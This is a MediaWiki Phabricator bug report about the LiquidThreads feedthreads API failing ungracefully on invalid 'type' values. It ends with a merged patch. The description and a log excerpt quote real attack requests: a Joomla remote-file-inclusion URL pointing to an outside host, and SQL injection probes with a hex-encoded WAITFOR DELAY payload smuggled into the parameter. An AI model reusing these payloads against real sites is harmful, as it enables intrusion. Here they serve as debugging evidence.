LQT: Make invalid type parameter in ApiFeedLQTThreads fail more gracefully
Closed, ResolvedPublicPRODUCTION ERROR
Actions

Description

Translatewiki has been having some hits meant for Joomla, attempting exploits..

/w/api.php?action=feedthreads&type=replie%20%E2%80%A6//includes/gacl_api.class.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt???: Exception: Internal error in ApiFormatFeedWrapper::execute: Invalid feed class/item

http://pywiki.pastey.net/132939

ApiBase::dieDebug( METHOD, 'Invalid feed class/item' );

is used in the formatbase, meaning it fails quite ungracefully...

Version: unspecified
Severity: normal

Details

Reference: bz22510

	Subject	Repo	Branch	Lines +/-
	Don't throw an exception when passed a bogus feed type	mediawiki/extensions/LiquidThreads	master	+1 -2

Customize query in gerrit

Related Objects
Search...

		Status	Subtype	Assigned	Task
		Resolved	PRODUCTION ERROR	Nikerabbit	T24510 LQT: Make invalid type parameter in ApiFeedLQTThreads fail more gracefully
		Open		None	T41830 Insufficient param validation

Event Timeline

• bzimport raised the priority of this task from to Medium.Nov 21 2014, 10:58 PM

• bzimport added a project: MediaWiki-extensions-LiquidThreads.

• bzimport set Reference to bz22510.

• bzimport added a subscriber: Unknown Object (MLST).

Reedy created this task.Feb 13 2010, 4:21 PM

Without having looked at the code in detail, I'd be inclined to say this is feedthreads's fault for not providing FormatFeedWrapper with the data format it expects (it's quite strict there). ApiFeedWatchlist handles this more gracefully.

Of course FormatFeedWrapper's pedantic behavior should be documented.

Hmm

Unfortunately we haven't got into the feedthreads code by that point...

Yes we have, we've already left it. FormatFeedWrapper expects certain things to be put in the result a certain way, and because that hasn't happened, it dies badly.

Bugs not actually an invalid feed.

It's from the type not being correctly set... For some reason, I can't seem to get it to dieUsage if the types not set (or bad)

type= doesn't use the default (as per the rest of the api)

if type != replies || newthreads then it barfs like the above..

Should be "handled" by the throw new MWException( "Unable to determine appropriate display type" ); on line 140 of ApiFeedLQTThreads.php, but it seems not to be, and it just carrys on.

Bug 22915 has been marked as a duplicate of this bug. ***

This needs to be fixed! It's flooding our exception logs more and more.

2012-01-13 02:20:55 mediawiki-bw_: /w/api.php?feedformat=atom&type=%27%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads Exception from line 138 of /www/w/extensions/LiquidThreads/api/ApiFeedLQTThreads.php: Unable to determine appropriate display type
2012-01-13 02:20:55 mediawiki-bw_: /w/api.php?feedformat=atom&type=%27%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads Exception from line 1491 of /www/w/includes/GlobalFunctions.php: Internal error in ApiFormatFeedWrapper::execute: Invalid feed class/item
[13-Jan-2012 02:20:55] PHP Fatal error: Call to a member function getPerformedAction() on a non-object in /www/w/includes/OutputPage.php on line 2863
2012-01-13 02:20:57 mediawiki-bw_: /w/api.php?feedformat=atom&type=1%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads Exception from line 138 of /www/w/extensions/LiquidThreads/api/ApiFeedLQTThreads.php: Unable to determine appropriate display type
2012-01-13 02:20:57 mediawiki-bw_: /w/api.php?feedformat=atom&type=1%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads Exception from line 1491 of /www/w/includes/GlobalFunctions.php: Internal error in ApiFormatFeedWrapper::execute: Invalid feed class/item
[13-Jan-2012 02:20:57] PHP Fatal error: Call to a member function getPerformedAction() on a non-object in /www/w/includes/OutputPage.php on line 2863
2012-01-13 02:20:59 mediawiki-bw_: /w/api.php?feedformat=atom&type=1%29%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads Exception from line 138 of /www/w/extensions/LiquidThreads/api/ApiFeedLQTThreads.php: Unable to determine appropriate display type
2012-01-13 02:20:59 mediawiki-bw_: /w/api.php?feedformat=atom&type=1%29%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads Exception from line 1491 of /www/w/includes/GlobalFunctions.php: Internal error in ApiFormatFeedWrapper::execute: Invalid feed class/item
[13-Jan-2012 02:20:59] PHP Fatal error: Call to a member function getPerformedAction() on a non-object in /www/w/includes/OutputPage.php on line 2863
2012-01-13 02:21:01 mediawiki-bw_: /w/api.php?feedformat=atom&type=%27%29%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads Exception from line 138 of /www/w/extensions/LiquidThreads/api/ApiFeedLQTThreads.php: Unable to determine appropriate display type
2012-01-13 02:21:01 mediawiki-bw_: /w/api.php?feedformat=atom&type=%27%29%20declare%20%40q%20varchar%288000%29%20select%20%40q%20%3D%200x57414954464F522044454C4159202730303A30303A313527%20exec%28%40q%29%20%2D%2D&talkpage=Support&action=feedthreads Exception from line 1491 of /www/w/includes/GlobalFunctions.php: Internal error in ApiFormatFeedWrapper::execute: Invalid feed class/item

(In reply to comment #5)

Should be "handled" by the throw new MWException( "Unable to determine
appropriate display type" ); on line 140 of ApiFeedLQTThreads.php, but it
seems
not to be, and it just carrys on.

The exception is thrown, which seems to cause the problem.

This fixes the error, though I'm not sure it's the right fix (I'm not familiar with the feed modules):

throw new MWException( "Unable to determine appropriate display type" );

+ $msg = 'lqt-feed-title-all';

(In reply to Sam Reed (reedy) from comment #0)

Translatewiki has been having some hits meant for Joomla, attempting
exploits..

/w/api.php?action=feedthreads&type=replie%20%E2%80%A6//includes/gacl_api.
class.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt???:
Exception: Internal error in ApiFormatFeedWrapper::execute: Invalid feed
class/item

We've not seen these lately, meaning exploiters got smarter, but the URL would currently gives:

<api>

<warnings>
  <feedthreads xml:space="preserve">Unrecognized value for parameter 'type': replie …//includes/gacl_api.class.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt???</feedthreads>
</warnings>
<error code="internal_api_error_MWException" info="Exception Caught: Unable to determine appropriate display type" xml:space="preserve">

#0 /www/translatewiki.net/w/extensions/LiquidThreads/api/ApiFeedLQTThreads.php(53): ApiFeedLQTThreads->createFeedTitle(Array)
#1 /www/translatewiki.net/w/includes/api/ApiMain.php(932): ApiFeedLQTThreads->execute()
#2 /www/translatewiki.net/w/includes/api/ApiMain.php(364): ApiMain->executeAction()
#3 /www/translatewiki.net/w/includes/api/ApiMain.php(335): ApiMain->executeActionWithErrorHandling()
#4 /www/translatewiki.net/w/api.php(85): ApiMain->execute()
#5 {main}

</error>
</api>

• werdna unsubscribed.Dec 10 2014, 5:24 PM

• demon added a project: Wikimedia-production-error.Feb 18 2015, 8:01 PM

• demon set Security to None.

Jdforrester-WMF added a project: Collaboration-Team-Triage.Jun 3 2015, 10:05 PM

hashar moved this task from Untriaged to Dec2019/1.35.wmf.10+ on the Wikimedia-production-error board.Jun 5 2015, 10:42 AM

• demon moved this task from Dec2019/1.35.wmf.10+ to Mar 2021 on the Wikimedia-production-error board.Jun 11 2015, 4:48 PM

hashar renamed this task from Make invalid type parameter in ApiFeedLQTThreads fail more gracefully to LQT: Make invalid type parameter in ApiFeedLQTThreads fail more gracefully.Jun 23 2015, 7:37 PM

LiquidThreads has been replaced by StructuredDiscussions on all Wikimedia production wikis (except one, which will be done soon). It is no longer under active development or maintenance, so I'm re-classifying all open LQT tasks as "Lowest" priority.

Meno25 unsubscribed.Aug 31 2016, 5:38 AM

Change 398409 had a related patch set uploaded (by Chad; owner: Chad):
[mediawiki/extensions/LiquidThreads@master] Don't throw an exception when passed a bogus feed type

https://gerrit.wikimedia.org/r/398409

gerritbot added a project: Patch-For-Review.Dec 15 2017, 2:02 AM

Change 398409 merged by jenkins-bot:
[mediawiki/extensions/LiquidThreads@master] Don't throw an exception when passed a bogus feed type

https://gerrit.wikimedia.org/r/398409

ReleaseTaggerBot added a project: MW-1.31-release-notes (WMF-deploy-2018-01-02 (1.31.0-wmf.15)).Dec 17 2017, 11:00 PM

Nikerabbit closed this task as Resolved.Dec 18 2017, 5:11 PM

Nikerabbit claimed this task.

• mmodell changed the subtype of this task from "Task" to "Production Error".Aug 28 2019, 11:12 PM

Maintenance_bot removed a project: Patch-For-Review.Aug 28 2019, 11:48 PM

• Phabricator_maintenance added a project: affects-translatewiki.net.Sep 26 2019, 1:53 PM

• Phabricator_maintenance removed a parent task: T41480: [DO NOT USE] Issues affecting translatewiki.net [superseded by #affects-translatewiki.net].Sep 26 2019, 1:55 PM

Krinkle moved this task from Mar 2021 to Untriaged on the Wikimedia-production-error board.Feb 10 2021, 7:25 PM